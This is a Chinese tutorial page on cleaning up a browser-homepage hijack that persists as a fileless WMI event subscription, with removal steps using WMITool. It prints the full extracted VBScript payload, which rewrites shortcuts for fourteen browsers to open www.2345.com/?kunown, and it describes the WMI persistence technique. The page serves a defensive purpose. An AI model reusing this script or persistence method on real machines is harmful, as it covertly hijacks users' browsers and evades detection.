IE,火狐以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法[图文]

所属分类: 软件教程 / 浏览下载 阅读数: 1161
收藏 0 赞 0 分享

近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE、Chrome、Firefox、Opera、Safari、Maxthon,均相同症状,检查浏览器首页设置——均正常!

最后发现,原来快速启动栏的IE浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。

IE快捷方式的命令被修改为http://www.2345.com/?kunown

之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。

打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改Win7下opera快速启动图标路径类似如下:

C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”(手工复制粘贴啊,默认出现的不是这个),确定,出现下图:

打开 WMI event viewer 填入 root\subscription

点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",右键选择view instant properties,如下图:

选择view instant properties

查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。

受到影响的浏览器有(各色浏览器,差不多齐了):

"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"

具体代码如下:

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!

删不掉?

到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!

暂时就这么多了,还有没有其它影响的话,用用再看吧!

解决方法来自:Gemini

更多精彩内容其他人还在看

opera浏览器怎么自动刷新 欧朋浏览器自动刷新功能使用教程

opera浏览器是一款非常受国内及国外朋友们喜爱的浏览器工具,它以快捷方便著称。有些时候我们浏览网页的需要设置网页自动刷新,下面小编就为大家介绍一下opera浏览器怎么自动刷新,有兴趣的朋友们可以了解下
收藏 0 赞 0 分享

opera浏览器怎么设置越野模式 欧朋浏览器越野模式打开教程

opera浏览器(欧朋浏览器)中有一个越野模式,该模式可以节省流量,在越野模式下你访问的是服务器的内容是不需要经过电脑加载的。那么,opera浏览器越野模式怎么打开?针对此问题,本文就为大家介绍欧朋浏览器越野模式的设置教程
收藏 0 赞 0 分享

傲游云浏览器自动刷新功能设置使用教程

近日,有部分网友问小编:傲游云浏览器怎么设置自动刷新?针对傲游云浏览器如何设置自动刷新网页的问题,本文就为大家介绍傲游云浏览器自动刷新功能设置使用教程
收藏 0 赞 0 分享

搜狗浏览器占用内存太大的四种解决办法

搜狗浏览器占用内存太大怎么办?占用过多的内存将导致电脑反应速度急剧下降,对此我们可以采取以下方法来解决,需要的朋友可以参考下
收藏 0 赞 0 分享

将世界之窗浏览器设置为默认浏览器的方法图解

世界之窗是国内首款用了chrome28内核的浏览器,它打开网页的速度是相当惊人的,兼容性也很不错。那么,我们如何将世界之窗浏览器设置为默认的浏览器呢?针对此问题,本文就为大家图解将世界之窗浏览器设置为默认浏览器的方法
收藏 0 赞 0 分享

世界之窗怎么设置主页?世界之窗浏览器首页设置方法介绍

世界之窗浏览器最大的特点就是打开网页的速度特别的快,很多使用世界之窗浏览器的朋友们都想给世界之窗浏览器设置一个固定的主页,那么世界之窗浏览器怎么设置主页呢?针对此问题,本文就为大家进行解答
收藏 0 赞 0 分享

世界之窗怎么设置兼容模式?世界之窗浏览器兼容模式设置教程

世界之窗浏览器最大的特点就是打开网页的速度特别的快,同时世界之窗浏览器也具有兼容模式的功能,设置兼容模式后可以为我们省去很多麻烦,那么,世界之窗浏览器兼容模式怎么设置呢?针对此问题,本文就为大家进行解答
收藏 0 赞 0 分享

电脑ie浏览器丢失重建的教程

电脑ie不小心删除了怎么办?载还麻烦, 用这个方法就能重现了,方法很简单,小白乱入都可以的哦,需要的朋友可以参考下
收藏 0 赞 0 分享

世界之窗浏览器怎么设置主页

世界之窗浏览器打开网页的速度非常快,非常适合网友们使用,下面以图文的形式为大家介绍下世界之窗浏览器怎么设置主页,感兴趣的朋友可以看看
收藏 0 赞 0 分享

世界之窗怎么清理缓存?世界之窗浏览器缓存清除教程

世界之窗浏览器是一款网页打开速度非常快的浏览器,浏览器用的太久就会有数据垃圾,过多的数据垃圾会导致浏览器正常运行。那么,世界之窗浏览器怎么清理缓存呢?针对此问题,本文就为打击图解世界之窗缓存清理步骤
收藏 0 赞 0 分享
查看更多